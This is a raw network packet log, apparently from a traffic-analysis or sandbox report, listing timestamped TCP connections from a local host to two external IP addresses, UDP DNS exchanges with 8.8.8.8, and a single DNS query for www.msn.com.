Jan 26, 2021 19:45:59.969923019 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.048559904 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.048662901 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.048713923 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.093369961 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.097774982 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.097966909 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.098109007 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.142997026 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.147403002 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.147465944 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.147479057 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.187134981 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.196811914 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.196861982 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.196965933 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.236735106 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.247637987 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.247675896 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.247747898 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.299007893 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.299093962 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.299402952 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.299477100 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.299894094 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.299968004 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.348968983 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.349035025 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.398099899 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.398199081 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.416614056 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.416688919 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.447257042 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.447339058 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.465756893 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.465878963 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.498334885 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.498430014 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.549552917 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.549684048 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.598890066 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.598927975 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.599020004 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.599205971 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.599287033 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.649158955 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.649374962 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.649451017 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.649796963 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.649929047 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.698529959 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.698600054 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.747780085 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.747903109 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.760610104 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.760678053 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.812134027 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.812311888 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.812345028 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.813740969 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.863374949 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.863667965 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.864921093 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.906183004 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.912527084 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.912744999 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.912833929 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.954078913 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.954296112 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.954309940 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.954503059 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.954806089 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.954829931 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.955204010 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.962112904 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.962244987 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:00.962342978 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:00.996741056 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.996764898 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.996786118 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.996825933 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.996861935 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.996889114 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.996953011 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.996964931 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.997062922 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.997102022 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.997133017 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.997224092 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.998891115 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.998918056 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.998996019 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.999005079 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.999388933 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.999459982 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:00.999490976 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:00.999602079 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:01.001051903 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:01.001080036 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:46:01.001148939 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:01.001158953 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:46:01.011424065 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.011512041 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.011662006 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.060517073 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.060673952 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.060695887 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.109287977 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.112344027 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.114726067 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.160223007 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.162722111 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.312679052 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.312802076 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.364234924 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.364453077 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.413532019 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.413691044 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.413719893 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.413969040 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.462786913 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.462909937 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.462949038 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.512005091 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.512145042 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.512182951 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.561237097 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.561362028 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.561423063 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.609339952 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.610404015 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.610641003 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.610728025 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.658463001 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.659589052 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.659737110 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.659817934 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.703355074 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.708771944 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.708966017 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.752546072 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.753456116 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.912874937 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.913074017 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:01.962472916 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:01.962668896 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.011723995 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.011961937 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.012018919 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.012154102 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.061184883 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.061244965 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.061441898 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.109241009 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.110529900 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.110677004 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.110795975 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.159538031 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.161024094 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.161113024 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.161227942 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.203876019 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.210164070 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.210376978 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.211435080 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.254745007 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.262316942 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.262502909 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.262528896 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.311543941 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.311733007 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.360816002 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.362004995 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.516781092 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.516894102 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.566045046 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.566899061 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.616022110 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.616195917 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.616215944 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.617054939 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.665208101 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.665936947 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.665975094 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.710863113 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.716228008 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.716413021 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.717415094 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.761547089 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.768192053 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.768307924 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.768333912 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:46:02.768465996 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.768476009 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:46:02.817305088 CET	80	49790	45.138.24.6	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 19:44:02.993038893 CET	60338	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:03.043802977 CET	53	60338	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:04.116122007 CET	58717	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:04.177619934 CET	53	58717	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:05.258722067 CET	59762	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:05.317347050 CET	53	59762	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:06.523667097 CET	54329	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:06.571649075 CET	53	54329	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:07.665237904 CET	58052	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:07.713083029 CET	53	58052	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:09.338989973 CET	54008	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:09.386842966 CET	53	54008	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:10.203071117 CET	59451	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:10.260735035 CET	53	59451	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.108239889 CET	52914	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.164788961 CET	53	52914	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.397770882 CET	64569	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.448553085 CET	53	64569	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.821141958 CET	52816	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.839364052 CET	50781	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.869055033 CET	53	52816	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.897134066 CET	53	50781	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:12.439893961 CET	54230	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:12.503371000 CET	53	54230	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:13.404998064 CET	54911	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:13.479212999 CET	53	54911	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:13.710218906 CET	49958	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:13.777025938 CET	53	49958	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:14.059123993 CET	50860	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:14.117424011 CET	53	50860	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:14.723361969 CET	50452	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:14.792490005 CET	53	50452	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.172902107 CET	59730	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:15.238953114 CET	53	59730	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.762856007 CET	59310	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:15.813783884 CET	53	59310	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.944129944 CET	51919	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:16.005400896 CET	53	51919	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:16.199652910 CET	64296	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:16.247451067 CET	53	64296	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:17.323821068 CET	56680	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:17.373538017 CET	53	56680	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:17.395212889 CET	58820	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:17.457542896 CET	53	58820	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:18.833287001 CET	60983	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:18.882883072 CET	53	60983	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:20.032145977 CET	49247	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:20.080059052 CET	53	49247	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:21.529850006 CET	52286	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:21.577744007 CET	53	52286	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:22.816001892 CET	56064	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:22.875411034 CET	53	56064	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:24.004837990 CET	63744	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:24.054457903 CET	53	63744	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:26.116363049 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:27.119858027 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.130816936 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.181720018 CET	53	61457	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:28.928478003 CET	58367	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.986675024 CET	53	58367	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:29.369446993 CET	60599	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:29.417937040 CET	53	60599	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:34.287796974 CET	59571	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:34.337919950 CET	53	59571	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:40.121989965 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:40.180481911 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:40.929605007 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:40.977605104 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.163480043 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.219980001 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.613308907 CET	60427	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.671884060 CET	53	60427	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.932552099 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.990911961 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:42.497716904 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:42.545490026 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:42.949671984 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:42.997647047 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:44.506155014 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:44.554092884 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:44.962238073 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:45.010066032 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:48.515727997 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:48.563651085 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:48.968615055 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:49.025178909 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:52.714642048 CET	56209	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:52.765424013 CET	53	56209	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:52.868155003 CET	59582	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:52.915985107 CET	53	59582	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:53.015986919 CET	60949	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:53.076345921 CET	53	60949	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:53.589876890 CET	58542	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:53.640605927 CET	53	58542	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:59.110050917 CET	59179	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:59.476310015 CET	53	59179	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:01.604585886 CET	60927	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:01.667434931 CET	53	60927	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:08.121176004 CET	57854	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:08.180840969 CET	53	57854	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:08.960386038 CET	62026	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:09.016892910 CET	53	62026	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:09.120060921 CET	59453	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:09.176258087 CET	53	59453	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:09.983807087 CET	62468	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:10.054007053 CET	53	62468	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:10.147603989 CET	52563	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:10.204359055 CET	53	52563	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:10.942673922 CET	54721	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:11.001180887 CET	53	54721	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:11.632985115 CET	62826	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:11.692070961 CET	53	62826	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:12.296797037 CET	62046	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:12.359728098 CET	53	62046	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:13.338100910 CET	51223	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:13.396527052 CET	53	51223	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:14.658134937 CET	63908	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:14.714534998 CET	53	63908	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:15.895750046 CET	49226	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:15.952486038 CET	53	49226	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:16.430962086 CET	60212	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:16.493179083 CET	53	60212	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:17.710565090 CET	58867	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:18.082550049 CET	53	58867	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:40.549433947 CET	50864	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:40.600249052 CET	53	50864	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:42.551076889 CET	61504	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:42.607575893 CET	53	61504	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:51.131093979 CET	60231	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:51.187516928 CET	53	60231	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:52.352104902 CET	50095	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:52.400259018 CET	53	50095	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.178844929 CET	59654	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.179373026 CET	58233	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.226835012 CET	53	59654	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.227113008 CET	53	58233	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.443766117 CET	56822	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.817686081 CET	53	56822	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:57.560383081 CET	62572	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:57.887608051 CET	53	62572	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:58.541121960 CET	57179	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:58.597937107 CET	53	57179	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 19:44:11.397770882 CET	192.168.2.7	8.8.8.8	0x1459	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
